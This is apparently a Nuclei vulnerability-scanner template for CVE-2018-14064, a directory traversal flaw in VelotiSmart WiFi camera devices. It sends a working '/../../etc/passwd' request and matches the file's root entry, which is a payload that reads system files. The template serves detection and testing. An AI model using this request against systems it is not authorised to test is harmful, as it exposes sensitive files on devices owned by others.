nuclei-templates/cves/2018/CVE-2018-14064.yaml

36 lines
924 B
YAML

id: CVE-2018-14064
info:
name: VelotiSmart Wifi - Directory Traversal
author: 0x_Akoko
severity: critical
description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.
reference:
- https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
- https://www.exploit-db.com/exploits/45030
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-14064
cwe-id: CWE-22
tags: edb,cve,cve2018,lfi,camera,iot
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/12